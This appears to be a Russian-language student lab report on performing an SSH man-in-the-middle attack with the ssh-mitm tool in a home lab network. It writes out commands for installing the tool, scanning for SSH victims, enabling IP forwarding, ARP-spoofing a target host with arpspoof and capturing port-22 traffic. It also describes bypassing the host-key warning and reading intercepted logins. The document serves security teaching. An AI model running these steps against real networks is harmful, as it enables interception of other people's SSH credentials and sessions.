# Практика 5
###### tags: `MiSD`, `MIREA`, `OSINT`
## Цель работы
Получение навыков по применению типа атаки Man-in-the-middle с использованием инструмента ssh-mitm.
## Выполнение работы
Установка необходимых компонентов:
```
sudo apt install python3-netaddr python3-netifaces
git clone https://github.com/jtesta/ssh-mitm
cd ssh-mitm/
export LANG=en_US.utf-8
sudo ./install.sh
```
Результат установки на kali:

Пример выполнения команды скрипта [JoesAwesomeSSHMITMVictimFinder.py](http://joesawesomesshmitmvictimfinder.py/):
```
sudo python ./JoesAwesomeSSHMITMVictimFinder.py --interface eth0 -v
```
Захват всего трафика:

На изображении можно увидеть, что на машине злоумышленника (Kali слева) отображается количество переданных пакетов в сети.
Собранный трафик:

Как видно с серверной машины (192.168.31.228) поступали пакеты на kali.
Получилось также найти адреса SSH агентов с помощью скрипта:

На картинке:
192.168.31.89 - Хост машина, Windows 11
192.168.31.111 - ВМ, Ubuntu
```
sudo apt-get install dsniff
echo 1 > /proc/sys/net/ipv4/ip_forward
sudo ./start.sh
sudo arpspoof -r -t 192.168.31.89 192.168.31.113
sudo tcpdump dst port 22
```
Получилось запустить ARP спуффинг. Результаты, а именно перехваченный трафик:

Сообщение о смене индентификации хоста:

Удаляю все записи из ~/.ssh/known_host для успешной авторизации снова.
Можно получить логи авторизации из auth.log:

> Для правильной работы и отображения логов в auth.log необходимо было установить rsyslog. До установки использовал journalctl.
